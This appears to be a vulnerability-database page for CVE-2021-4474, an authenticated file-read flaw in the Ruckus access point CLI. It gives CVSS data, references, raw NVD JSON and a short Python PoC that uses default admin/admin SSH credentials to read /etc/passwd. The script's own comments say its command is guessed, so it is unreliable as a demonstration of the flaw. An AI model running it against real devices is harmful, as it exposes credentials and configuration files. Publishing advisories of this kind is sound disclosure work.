Security Vulnerability Report
CVE-2021-4474 CVSS 4.9 MEDIUM

CVE-2021-4474

Published: 2026-03-26 20:16:08
Last Modified: 2026-03-30 13:26:51

Description

Ruckus Access Point products contain an arbitrary file read vulnerability in the command-line interface that allows authenticated remote attackers with administrative privileges to read arbitrary files from the underlying filesystem. Attackers can exploit this vulnerability to access sensitive information including configuration files, credentials, and system data stored on the device.

CVSS Details

CVSS Score
4.9
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Ruckus Access Point series (refer to the official security bulletin for the specific affected versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
# PoC for CVE-2021-4474: Ruckus AP CLI Arbitrary File Read
# This script demonstrates reading a sensitive file via the CLI.
# Note: Exploitation requires Administrative Privileges (PR:H).
import paramiko


def exploit(target_ip, username, password, file_path):
    try:
        print(f"[*] Connecting to {target_ip}...")
        # Establish SSH connection to the Ruckus AP CLI
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(target_ip, username=username, password=password, timeout=10)

        print(f"[*] Attempting to read {file_path}...")
        # Execute command to read arbitrary file
        # The specific command may vary depending on the specific CLI shell implementation.
        # Typically, if it's a Linux-based shell, 'cat' is used.
        stdin, stdout, stderr = client.exec_command(f"cat {file_path}")
        output = stdout.read().decode().strip()
        err = stderr.read().decode().strip()

        if output:
            print("[+] Success! File content:")
            print("-" * 20)
            print(output)
            print("-" * 20)
        else:
            print(f"[-] Failed to read file. Error: {err}")

        client.close()
    except Exception as e:
        print(f"[-] An error occurred: {e}")


if __name__ == "__main__":
    # Example usage
    # Replace with actual target IP and credentials
    TARGET = "192.168.1.1"
    USER = "admin"
    PASS = "admin"
    FILE = "/etc/passwd"
    exploit(TARGET, USER, PASS, FILE)

References

https://support.ruckuswireless.com/security_bulletins/306
https://www.vulncheck.com/advisories/ruckus-ap-cli-arbitrary-file-read-allows-authenticated-remote-file-access

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-4474", "sourceIdentifier": "[email protected]", "published": "2026-03-26T20:16:07.730", "lastModified": "2026-03-30T13:26:50.827", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ruckus Access Point products contain an arbitrary file read vulnerability in the command-line interface that allows authenticated remote attackers with administrative privileges to read arbitrary files from the underlying filesystem. Attackers can exploit this vulnerability to access sensitive information including configuration files, credentials, and system data stored on the device."}, {"lang": "es", "value": "Los productos Ruckus Access Point contienen una vulnerabilidad de lectura arbitraria de archivos en la interfaz de línea de comandos que permite a atacantes remotos autenticados con privilegios administrativos leer archivos arbitrarios del sistema de archivos subyacente. Los atacantes pueden explotar esta vulnerabilidad para acceder a información sensible, incluyendo archivos de configuración, credenciales y datos del sistema almacenados en el dispositivo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N", "baseScore": 4.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-552"}]}], "references": [{"url": "https://support.ruckuswireless.com/security_bulletins/306", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/ruckus-ap-cli-arbitrary-file-read-allows-authenticated-remote-file-access", "source": "[email protected]"}]}}